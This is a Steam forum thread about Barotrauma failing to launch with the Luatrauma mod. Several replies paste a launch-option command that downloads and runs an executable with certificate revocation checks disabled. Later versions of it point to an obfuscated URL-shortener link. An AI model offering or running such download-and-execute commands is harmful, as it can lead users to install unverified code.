Barotrauma 潜渊症

Barotrauma 潜渊症

Lua For Barotrauma
Wistful_Muse 2024 年 12 月 15 日 下午 12:42
Help with Lua (not being able to launch the game)
Hi!

I recently subscribed to Lua via the Steam Workshop for the first time, and have followed all instructions on the workshop page.

I had went onto the properties page, placed the code for Windows into the launch options box and when I try to launch the game, it runs for a few seconds, a command console pops up and then the game stops running. I cannot get into the game. I have done all the troubleshooting options from the Workshop page and none of them have seemed to help.

When I remove the code from the launch options, it seems to work fine, but I'm not sure what I'm doing wrong here. Any insight would be appreciated, thank you! :)
< >
正在显示第 1 - 15 条,共 18 条留言
wAcKoMaTiC007 1 月 8 日 下午 12:27 
I'm having the exact same issue
Miriouki 1 月 9 日 上午 11:23 
Same issue here too
Fly_Cloud 1 月 10 日 下午 7:24 
well,same issue,I found a strong lag in the submarine editor.Every time an item is placed, there will be a lag of about 1 second.
Leonidas 1 月 17 日 下午 12:18 
I believe it's an issue with firewalls? Perhaps some antivirus
SuperErnie1751 1 月 19 日 下午 12:26 
The main issue can be the usage of an antivirus, disabling it would probably make it run fine.
Fly_Cloud 1 月 24 日 下午 11:35 
oh,I found the solution,I made an incorrect configuration in PF.I reinstalled PF and applied the default configuration.:happy_seagull:
Marmot 4 月 11 日 下午 7:39 
I've got a similar issue, I copied and pasted the entire windows install command since that's the OS I use but when I try opening the game I get a brief command console window that closes almost immediately and the game doesn't open at all
VanishGuy 4 月 28 日 下午 2:39 
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)
VanishGuy, you are a sainte
Mephyst 5 月 5 日 下午 3:19 
had the same problem, VanishGuy's solution above fixed it
VanishGuy 5 月 6 日 上午 1:55 
引用自 Wistful_Muse
Hi!

I recently subscribed to Lua via the Steam Workshop for the first time, and have followed all instructions on the workshop page.

I had went onto the properties page, placed the code for Windows into the launch options box and when I try to launch the game, it runs for a few seconds, a command console pops up and then the game stops running. I cannot get into the game. I have done all the troubleshooting options from the Workshop page and none of them have seemed to help.

When I remove the code from the launch options, it seems to work fine, but I'm not sure what I'm doing wrong here. Any insight would be appreciated, thank you! :)
UPDATED SOLUTION
I reached the character limit for the startup parameter command, had to shorten link

cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
Vainglorious 7 月 4 日 上午 10:25 
引用自 VanishGuy
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)

i pasted this to my lunch options still same problem
VanishGuy 7 月 5 日 上午 10:33 
引用自 Vainglorious
引用自 VanishGuy
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)

i pasted this to my lunch options still same problem

Try this one.
cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
Alex 7 月 5 日 下午 1:45 
The game doesnt start with after add text at windows
VanishGuy 7 月 6 日 上午 8:40 
引用自 Alex
The game doesnt start with after add text at windows
From your answer, as I understand, you inserted this command into the Windows console line, but this is not what is needed

You need to add the following text
1) rmb (on barotrauma)
2)properties
3)paste this text in launch properties:

cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"

DO NOT FORGET TO DELETE "DELETE_THIS" FROM COMMAND
< >
正在显示第 1 - 15 条,共 18 条留言
每页显示数: 1530 50